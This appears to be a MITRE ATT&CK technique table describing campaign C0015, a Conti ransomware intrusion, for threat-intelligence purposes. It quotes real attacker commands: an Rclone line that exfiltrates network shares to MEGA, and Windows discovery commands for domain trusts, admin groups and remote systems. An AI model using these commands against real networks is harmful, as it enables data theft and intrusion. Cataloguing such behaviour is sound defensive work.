| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.003 | Windows Command Shell | During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries. |
| enterprise | T1059.005 | Visual Basic | During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code. |
| enterprise | T1059.007 | JavaScript | During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code. |
| enterprise | T1486 | Data Encrypted for Impact | During C0015, the threat actors used Conti ransomware to encrypt a compromised network. |
| enterprise | T1005 | Data from Local System | During C0015, the threat actors obtained files and data from the compromised network. |
| enterprise | T1039 | Data from Network Shared Drive | During C0015, the threat actors collected files from network shared drives prior to network encryption. |
| enterprise | T1074 | Data Staged | - |
| enterprise | T1074.001 | Local Data Staging | During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`. |
| enterprise | T1030 | Data Transfer Size Limits | During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration. |
| enterprise | T1482 | Domain Trust Discovery | During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts. |
| enterprise | T1567 | Exfiltration Over Web Service | - |
| enterprise | T1567.002 | Exfiltration to Cloud Storage | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. |
| enterprise | T1083 | File and Directory Discovery | During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful. |
| enterprise | T1105 | Ingress Tool Transfer | During C0015, the threat actors downloaded additional tools and files onto a compromised network. |
| enterprise | T1570 | Lateral Tool Transfer | During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network. |
| enterprise | T1036 | Masquerading | During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file. |
| enterprise | T1135 | Network Share Discovery | During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares. |
| enterprise | T1027 | Obfuscated Files or Information | During C0015, the threat actors used Base64-encoded strings. |
| enterprise | T1588 | Obtain Capabilities | - |
| enterprise | T1588.001 | Malware | For C0015, the threat actors used Cobalt Strike and Conti ransomware. |
| enterprise | T1588.002 | Tool | For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker. |
| enterprise | T1069 | Permission Groups Discovery | - |
| enterprise | T1069.001 | Local Groups | During C0015, the threat actors used the command `net localgroup "adminstrator"` to identify accounts with local administrator rights. |
| enterprise | T1069.002 | Domain Groups | During C0015, the threat actors used the command `net group "domain admins" /dom` to enumerate domain groups. |
| enterprise | T1566 | Phishing | - |
| enterprise | T1566.001 | Spearphishing Attachment | For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims. |
| enterprise | T1057 | Process Discovery | During C0015, the threat actors used the `tasklist /s` command as well as Task Manager to obtain a list of running processes. |
| enterprise | T1055 | Process Injection | - |
| enterprise | T1055.001 | Dynamic-link Library Injection | During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process. |
| enterprise | T1219 | Remote Access Software | During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network. |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.001 | Remote Desktop Protocol | During C0015, the threat actors used RDP to access specific network hosts of interest. |
| enterprise | T1018 | Remote System Discovery | During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell `Invoke-ShareFinder` script for file share enumeration. |
| enterprise | T1553 | Subvert Trust Controls | - |
| enterprise | T1553.002 | Code Signing | For C0015, the threat actors used DLL files that had invalid certificates. |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.005 | Mshta | During C0015, the threat actors used `mshta` to execute DLLs. |
| enterprise | T1218.010 | Regsvr32 | During C0015, the threat actors employed code that used `regsvr32` for execution. |
| enterprise | T1218.011 | Rundll32 | During C0015, the threat actors loaded DLLs via `rundll32` using the svchost process. |
| enterprise | T1016 | System Network Configuration Discovery | During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host. |
| enterprise | T1124 | System Time Discovery | During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network. |
| enterprise | T1204 | User Execution | - |
| enterprise | T1204.002 | Malicious File | During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document. |
| enterprise | T1047 | Windows Management Instrumentation | During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host. |